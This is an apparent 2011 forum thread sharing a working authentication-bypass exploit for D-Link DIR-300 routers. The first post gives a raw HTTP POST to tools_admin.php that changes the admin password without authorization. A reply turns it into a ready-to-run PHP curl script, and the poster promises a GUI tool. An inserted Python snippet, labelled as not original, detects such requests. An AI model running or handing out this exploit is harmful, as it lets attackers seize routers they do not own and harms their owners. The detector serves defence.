Vcoderz Community
Old 02-09-2011   #1
Google

 
Change D-Link DIR-300 (and others) routers password

The control panel script tools_admin.php allows an attacker to change the
administrator name, password and other variables without any
authorization by sending a specially crafted HTTP POST request such as:

---cut here---

POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh

---cut here---

Enjoy


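A detection-side check for the request in the post above, added here as an example and not part of the original thread: it flags POSTs to tools_admin.php whose form body carries the NO_NEED_AUTH / AUTH_GROUP fields or the admin credential fields. The function name, finding labels and sample request (with a placeholder password) are constructed; treating those two fields as auth state a client should never send is an assumption.

```python
from urllib.parse import parse_qs, urlsplit

# Field names come from the request in the post; treating them as server-side
# auth state that a client should never supply is an assumption.
AUTH_STATE_FIELDS = {"NO_NEED_AUTH", "AUTH_GROUP"}
CREDENTIAL_FIELDS = {"admin_name", "admin_password1"}

# Constructed sample shaped like the request in the post (placeholder password).
SAMPLE = (
    "POST http://192.168.1.1:80/tools_admin.php HTTP/1.1\r\n"
    "Host: 192.168.1.2\r\n"
    "Content-length: 0\r\n"
    "\r\n"
    "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&NO_NEED_AUTH=1"
    "&AUTH_GROUP=0&admin_name=admin&admin_password1=EXAMPLE"
)


def inspect_request(raw: str) -> list[str]:
    """Return findings for one raw HTTP request (empty list = nothing flagged)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    try:
        method, target, _version = lines[0].split()
    except ValueError:
        return ["malformed request line"]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    # The target may be origin-form (/x.php) or absolute-form (http://host/x.php).
    path = urlsplit(target).path
    if method.upper() != "POST" or not path.lower().endswith("/tools_admin.php"):
        return []
    findings, body = [], body.strip()
    # Parse the body even when Content-Length disagrees with it, as in the post.
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body.encode()):
        findings.append("content-length mismatch")
    fields = parse_qs(body, keep_blank_values=True)
    if AUTH_STATE_FIELDS & fields.keys():
        findings.append("client-supplied auth state")
    if CREDENTIAL_FIELDS & fields.keys():
        findings.append("admin credential change")
    return findings

if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```

A credential change without the auth-state fields is reported on its own, so legitimate admin activity can be told apart from the bypass-shaped request.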
Old 02-09-2011   #2
gachkar

hey thanks for the post !
but how to use it ? where to save it ? to what extension ?
Old 02-10-2011   #3
Google

 

Quote:
Originally Posted by gachkar
hey thanks for the post !
but how to use it ? where to save it ? to what extension ?

That was the HTTP POST request. You can send it using any language like PHP, PERL, PYTHON... That's the PHP code:

Code:
<?php
// Expects three arguments: router IP, port, new admin password.
if (sizeof($argv) != 4) {
   echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
   exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
// Same form body as the raw request in post #1; the password argument is URL-encoded.
curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if ($out === false) {
   echo "- Error: could not connect (http://$argv[1]:$argv[2]/tools_admin.php).\n";
   exit;
} else
   echo "+ request sent\n";
curl_close($ch);
// stripos() returns an offset or false, never true, so compare against false.
if (stripos($out, "login.php") !== false) {
   echo "- something goes wrong (check answer - answer.html) !\n";
   $f = fopen("answer.html", "w"); fwrite($f, $out); fclose($f);
   exit;
}
else
   echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>

If you want, I will make a GUI executable file and post it here later.
Old 02-13-2011   #4
yaleil

can you do that please?
Old 02-17-2011   #5
Google

 

Quote:
Originally Posted by yaleil
can you do that please?

Here it is. But don't pwn yourself